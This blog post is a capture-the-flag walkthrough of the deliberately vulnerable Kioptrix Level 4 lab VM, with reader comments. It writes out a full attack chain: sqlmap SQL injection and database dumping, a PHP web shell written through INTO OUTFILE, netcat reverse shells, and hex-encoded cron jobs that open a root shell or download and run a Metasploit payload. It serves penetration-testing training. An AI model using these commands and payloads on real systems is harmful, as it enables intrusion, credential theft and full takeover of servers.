g0tmi1k: [Video] Kioptrix - Level 4 (SQL Injection)

Links
Watch video on-line: https://blip.tv/g0tmi1k/kioptrix-level-4-sql-injection-5967372
Download video: http://www.mediafire.com/?sbm8az6gkxdluy7

Brief Overview

Kioptrix which is a "boot-to-root" operating system which has purposely designed weaknesses built into it. The user's end goal is to interact with system using the highest user privilege they can reach.

There are other vulnerabilities using different techniques to gain access into this box such as breaking through a limited shell as well as local file inclusion using PHP session data.

Method

Scanned network for the target [Netdiscover]
Port scanned the target [UnicornScan]
Banner grabbed the services running on the open port(s) [NMap]
Interacted with the web server & discovered a the web application that is possibly subject to a SQL injection vulnerability [Firefox]
Exploited the SQL injection and enumerated database [SQLMap]
Uploaded a web shell backdoor [SQLMap & Netcat] (Limited user)
Manually performed SQL injection injection to dump database [Burp Proxy]
Created a web shell on the target [Burp Proxy & Netcat] (Limited user)
Created a backdoor shell via a cron job [Burp Proxy & Netcat] (Superuser)
Accessed the 'flag' [Text file]
Created a backdoor shell via a cron job [Burp Proxy & Metasploit] (Superuser)

Tools

Kioptrix4_vmware.rar (MD5: BB4E81EFAAD0E77CD2FCAF02B01A36A3).
A virtual machine (Example: VMware Player or Virtual Box).
Netdiscover – (Can be found in BackTrack 5).
UnicornScan – (Can be found in BackTrack 5's repository).
NMap – (Can be found in BackTrack 5).
Firefox – (Can be found in BackTrack 5).
Tamper Data – (Can be found in BackTrack 5).
Burp Proxy – (Can be found in BackTrack 5).
Netcat – (Can be found in BackTrack 5).
SQLMap – (Can be found in BackTrack 5).
Msfvenom – (Part of Metasploit & Can be found in BackTrack 5).

Walkthrough

The first step to attack the target, is to discover it. Scanning with "Netdiscover" produces a list of all IP's & MAC addresses and known vendors which are currently connected to the network. The attacker has prior knowledge and knows the target hasn't spoofed their MAC address as well as being inside a VM. Due to there being only one vendor which relates to a VM, VMware, they successfully identified the target.

By having the target's IP address, the attacker now focuses specifically on the target. The next thing they do is a port scan of every TCP & UDP port. "UnicornScan" shows five open ports; TCP 22 (SSH), TCP 80 (HTTP), TCP 139 (NetBIOS), TCP 445 (SMB) & UDP 137 (NetBIOS). "nmap" verifies the port scan results and at the same time the attacker takes advantage of nmap's inbuilt scripting engine, which detects what services are listening on each port, banner grab (which could possibly identify the software being used & its version) as well as fingerprinting the operating system. Depending on the outcome produced by the scan, nmap could decide to execute any other script(s). In this instance various samba scripts were executed to automatically enumerate it. Nmap fingerprintted the operating system as Linux 2.6.9-2.6.31.

By interacting with the web service using "firefox" the attacker is able to see if any web application is running. The web server responds and presents them with a login screen. The attacker fills in a common username, "admin" and uses "'" as a password. The server responds with a MySQL error message saying there has been a problem processing our request. This signals there is a possible MySQL injection vulnerability.

The attacker can automate the database injection procedure by using "SQLMap" which dramatically speeds up the attack. The attacker uses the same URL which the error was produced on, and with the aid of "tamper data" they are also able easily to clone the same (POST) data which is sent to the target. Editor's note: It could have been just as quick to manually type out the request using the page's source code!). The first attempt to exploit the database, fails, however SQLMap states it can try more 'aggressive and complex' injection methods by increasing the level and risk factor, which the attacker does on the second try. This is successful, allowing the SQLMap to function fully benefiting the attacker. The attacker starts to emulate the back end database and discovers software versions, the operating system, current database & user and if they are a database administrator. Afterwards the attacker starts to view the content of the databases. This is a common procedure as MySQL has an option to automate this, '--dbs', however if there is a specific SQL statement the attacker manually wishes to execute, they can use,' --sql-shell', to do so. The attacker demonstrates this by viewing the contents of the table "members" (however this could have been automated with '-D members -T members --dump'). Editor's note: I also wanted to demonstrate SQLMap output modes; 'minimal' (-v 0) which is just the outcome of the request as well as being able to show the SQL statements its currently sending (-v 3), therefore educating the attacker! SQLMap can also display a lot more detail - such as what SQLmap sees by the server response).

Another feature of SQLMap (like its ability to give an interactive shell to the database), it can also attempt to get an interactive shell on the system itself, thus giving the attacker remote access to the target. The attacker tries out this feature and it is successful, allowing the attacker to execute commands locally on the target. Editor's note: Due to the web root folder permissions set to superuser, and how sqlmap works (it writes using MySQL to the web root folder, a small client which then the web server uses to execute commands/upload files, thus it uses two different user accounts - this is covered later), the attacker needs to use the 'same method used for file stager'. The attacker creates another shell (a fall back, which is useful incase one shell is terminated for whatever reason....) using a reverse netcat shell.

SQLMap has automated alot of aspects in the database injection, however the attacker wishes to have a little bit more 'control' by manually performing the attack themselves. The attacker starts "Burp Proxy" and configures it as burp allows for easy alternating and repeating requests. Firefox's proxy settings are altered to direct the traffic into burp. Now when the attacker tries to login using firefox, burp captures the request which they can manipulate. The attacker alters the password field to write every value in the database into a file located in the web root folder, as this would allow for the attacker to be able to read it (if they didn't have a remote shell). When the attacker uses the shell to view the listing of the directory, they notice that the user "root" has created the file. The attacker can use this to their advantage later.

The information learnt from the database isn't new to the attacker, as SQLMap simplified the procedure just like creating a web shell to control the target, which the attacker now manually repeats. The attacker uses MySQL to write the backdoor file into the (default) web root folder which is done so by the user 'root', and then uses the web server to execute the code which uses the user 'www-data'. As the vulnerable code requests three values (id, password, username) the attacker 'nulls' the values with blank spaces, plus instead of making it return every value by using "OR", they replace it with "AND" thus always being true, and therefore, only returning one value, so then the attacker's command is only executed once. The attacker also encodes the string as HEX which is to be printed into the file as this isn't interpreted by anything else, which means it wouldn't affect the rest of the code in the vulnerable function.

The attacker now tries something which wasn't automated by SQLmap, as the attacker now knows the MySQL is being executed as root, they write a file into the "cron.d" directory which is used for scheduling. At certain intervals the commands specified within each 'job' is executed as the specified user. The attacker crafts an 'evil' job which is designed to create a reserve shell to be executed as the superuser to be run every minute. The attacker set up a listener to catch the connection from the target and then waits (up to) a minute for the schedule cron job to be executed.... Editor's note: The attacker is able to go from "nothing to root", in two commands! An SQLi command and then setting up netcat to listen.

...It wasn't long before the attacker was presented with a shell which has superuser privileges.

Game over

When they explore root's personal home folder, they notice a text file called "congrats.txt". When the attacker opens it up they see that they have been notified that they have reached the end goal.

The attacker tries to repeat the last injection, but, they replace netcat to create the connection with another binary file. This file is created from the "metasploit framework". This would be necessary if netcat wasn't located on the system. However this time the cron job has been altered slightly. It's still scheduled to be executed on the next minute by the superuser, but the commands have been modified to:

Automatically delete the cron job (thus it is only executed once).
Move into a folder that is able to be written into and executed from.
Download the binary file from the attacker.
Give it execute permissions.
Execute the binary file.
Delete the binary file.

The attacker sets up another listener, starts the web server with the binary file in the web root folder and waits for the target to connect...

Game over...again

Commands

netdiscover -r 192.168.0.1/24
us -mT -Iv 192.168.0.4:a -r 3000 -R 3 && us -mU -Iv 192.168.0.4:a -r 3000 -R 3
nmap -p 1-65535 -T4 -A -v 192.168.0.4    # -p 22,80,139,445
BT -> firefox -> 192.168.0.4 -> admin:123
// Firefox -> 192.168.0.4 -> admin:'
cd /pentest/database/sqlmap
// Firefox -> Tools -> Addons -> Enable Tamper Data -> Restart firefox
// Firefox -> Tools -> Tamper Data
// Firefox -> 192.168.0.4 -> admin:123
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword                       # y/n
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword  --level=5 --risk=5   # n/n
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 --fingerprint --banner --current-db --current-user --is-dba
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 3 --dbs
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members --tables
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members -T members --columns --count
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 -D members -T members --dump   # john:MyNameIsJohn # robert:ADGAdsafdfwt4gadfga==
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch -v 0 --users --passwords
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/etc/passwd"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_etc_passwd
#find / -name apache2.conf
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read=/etc/apache2/apache2.conf
#tail /pentest/database/sqlmap/output/192.168.0.4/files/_etc_apache2_apache2.conf
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read=/etc/apache2/sites-enabled/000-default
#grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.4/files/_etc_apache2_sites-enabled_000-default
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/var/www/index.php"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_index.php
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" --batch --file-read="/var/www/checklogin.php"
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_checklogin.php
#cat /pentest/database/sqlmap/output/192.168.0.4/files/_var_www_checklogin.php | grep -i pass -A 1 -B 1
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --sql-shell -> select * from members -> q   # a/n/a
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --os-shell                                  # n, 3, /var/www/, *none*, y
id                                                                                                                                                           # a <-- All
whereis nc

ifconfig
nc -lvvp 443

/bin/nc.traditional 192.168.0.192 443 -e /bin/sh

id
ls
pwd
#cd /pentest/backdoors/web/weevely
#python weevely.py
#python weevely.py generate g0tmi1k /tmp/output.php
#firefox -> 192.168.0.4/*randomstring*.php   # FAILS
#cd -
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --file-write=/tmp/output.php --file-dest=/var/www/output.php
#python weevely.py http://192.168.0.4/output.php g0tmi1k :system.info auto
#python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -v 0 --os-pwn    # n, 1, 3, /var/www/, *none*, y, 1, *ourIP*, *port*, 1, 1
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite    # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Burp -> Proxy -> Intercept -> Off. Proxy -> Options -> Port: 8080.
BT -> firefox -> 192.168.0.4 -> admin:'
// Burp -> target -> site map -> http://192.168.0.4 -> checklogin.php -> Right click: myusername=admin&mypassword=%27 -> Send to repeater
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' OR 1=1 INTO OUTFILE '/var/www/dump' -- &Submit=Login -> go
curl 192.168.0.4/dump

ls -lah   # ROOT ONLY! =)

// Burp -> decoder -> <?php passthru($_GET['cmd']); ?> -> encode: ascii hex
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/var/www/backdoor.php' LINES TERMINATED BY 0x3c3f70687020706173737468727528245f4745545b27636d64275d293b203f3e -- &Submit=Login -> go

// Burp -> decoder -> * * * * * root /bin/nc.traditional 192.168.0.192 444 -e /bin/sh -> encode: ascii hex       # Dont forget new line at the end!
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/etc/cron.d/backdoor' LINES TERMINATED BY 0x2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203139322e3136382e302e31303220343434202d65202f62696e2f73680a -- &Submit=Login -> go

nc -lvvp 444

date
*wait up to 1 minitue*

id
cd /root
ls -lah
cat congrats.txt

ccd /tmp
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=446 X > back.door
file back.door
ls -lh back.door
python -m SimpleHTTPServer &
msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E
// Burp -> decoder -> * * * * * root rm /etc/cron.d/exploit; cd /tmp && wget 192.168.0.192:8000/back.door && chmod +x back.door && ./back.door; rm /tmp/back.door -> encode: ascii hex       # Dont forget new line at the end!
// Burp -> repeater -> 2 -> raw: myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/etc/cron.d/exploit' LINES TERMINATED BY 0x2a202a202a202a202a20726f6f7420726d202f6574632f63726f6e2e642f6578706c6f69743b206364202f746d703b2077676574203139322e3136382e302e3139323a383030302f6261636b2e646f6f722026262063686d6f64202b78206261636b2e646f6f72202626202e2f6261636b2e646f6f723b20726d206261636b2e646f6f720a -- &Submit=Login -> go

date
*wait up to 1 minitue*

id

Notes

You need to create a new virtual machine and attach an existing hard drive (kioptrix 4!).
The target uses DHCP to obtain an IP address.

Songs: Memory Lane - Netsky & Just One Second (Apex Remix) - London Elektricity
Video length: 11:31
Capture length: 36:49
Blog Post: http://g0tmi1k.blogspot.com/2012/02/video-kioptrix-level-4-sql-injection.html
Forum Post: *coming soon*

~g0tmi1k

6 comments:

Daniel Mendoza Pimentel21 February 2012 17:14
Is there a way for a succesful SQL Injection with OS ownage if mysql does not have write permissions? I've been trying to find a folder in the Document Root, but looks like mysql was not giving permission to write there. Is there a way to overcome this?
Chris Spehn23 February 2012 10:04
I was really impressed with your local privilege escalation method in this video. I did things completely different from you. I know some of this is shown in your other videos, but I got root like this:

1) SQLi Login page
2) Dirbuster to discover usernames (Forgot for LFI)
3) Modify requests with burp to get user credentials
4) SSH with new creds, break out of lshell with echo os.system
5) Find services running as root
6) Enumerate needed information using MySQL load_file
7) MySQL sys_exec to get root shell

Anyway, I really enjoy your write ups. After finishing a new boot to root, I always check your blog to compare our methods. I typically find your solutions to be more elegant though. I always learn quite a bit from you, keep up the great work!

How did you learn to use the Burp suite so well?
odoggz25 April 2012 18:52
Yes this was another gem I learned a thing or two from! Thanks for making it. I also did like Chris Spehn, but at his step 3, enter the login with the valid username (from step 2) and typical sqli entry to the password field. That sqli prints the username and password on the next page which is the admin panel for that admin. Ssh in and used sys_exec to escalate the privs of the user I ssh'd in with.
bukovinai26 September 2012 11:14
Hi g0tm1lk, your videos are amazing! You are awesome :)

I have a strange problem with kioptrix4. If I run sqlmap this doesn't recognize the dbms...

[11:59:47] [INFO] testing MySQL
[11:59:47] [PAYLOAD] -7246
[11:59:48] [WARNING] the back-end DBMS is not MySQL

The sqlmap found the vulnerable, but I don't use the payload.
I updated the sqlmap with --update command, but it isn't help for me.
Do you have any idea what is the problem ?

This is the command :

python /pentest/database/sqlmap/sqlmap.py -u http://192.168.75.13/checklogin.php --data="POSTDATA=myusername=admin&mypassword=pass&Submit=Login" -p mypassword --level=5 --risk=5 -v 3

and here the payload :

Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: POSTDATA=myusername=admin&mypassword=-5329' OR (3177=3177) AND 'FKSv'='FKSv&Submit=Login
Vector: OR ([INFERENCE])

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: POSTDATA=myusername=admin&mypassword=pass' AND 6432=BENCHMARK(5000000,MD5(0x5870705a)) AND 'xHZi'='xHZi&Submit=Login
Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])

Please help me :)
SummitTechnology11 March 2013 10:29
If you want to see the mind blowing article with real facts and figures, this has really tremendous impacts on readers and I admire the writing skill of the author.

optical storage disks
Promo Disc15 April 2013 11:51
This is a good post. This post give truly quality information.I’m definitely going to look into it.Really very useful tips are provided here.thank you so much.Keep up the good works
DVD distribution

Note: only a member of this blog may post a comment.

2012-02-19

[Video] Kioptrix - Level 4 (SQL Injection)

6 comments:

Subscribe To